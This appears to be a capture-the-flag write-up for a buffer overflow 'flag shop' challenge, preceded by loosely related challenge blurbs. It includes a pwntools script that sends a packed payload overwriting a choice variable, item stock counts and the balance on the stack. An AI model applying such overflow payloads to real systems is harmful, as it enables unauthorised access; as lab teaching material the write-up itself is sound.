I want to make a discord bot but I don’t know how to use discord.py, so I made a prototype in C.
Pst! I heard you were looking to get some flags from that flag shop over there, but they were out of stock. Luckily, I think I can help you with that… I’ve attached the source code of the shop here, and you can download the binary here. Contact me at nc 30003 if you’re still keen…
This is a simple buffer overflow challenge, with a helpful stack diagram even showing you the layout of the stack itself. The challenge already does a helpful job of explaining the basics of a buffer overflow. The stack diagram thing was cool and helpful. However, it seems that many people were stuck on how to give themselves the $2,147,483,647 (0x7fffffff) required to get the flag, since that requires one to input 0x7fffffff as little-endian.
We can send the 0x7fffffff input with a pwntools script:
1 2 3 4 5 6 7 8 9 10 11
from pwn import *
# target = process("./guide") # use this for local testing
target = remote("", 30001)
for i inrange(12):
target.sendline(b'') # press enter through the buffer overflow guide
target.sendline(p64(0x1) + p32(0x1) + p32(0x1) + p32(0x1) + p32(2147483647)) # payload
target.sendline(b'2') # shop
target.sendline(b'3') # buy flag
We have overwriten choice with the value of 1, overwritten the stock counts of all three items with 1, and overwritten the value of balance with 0x7fffffff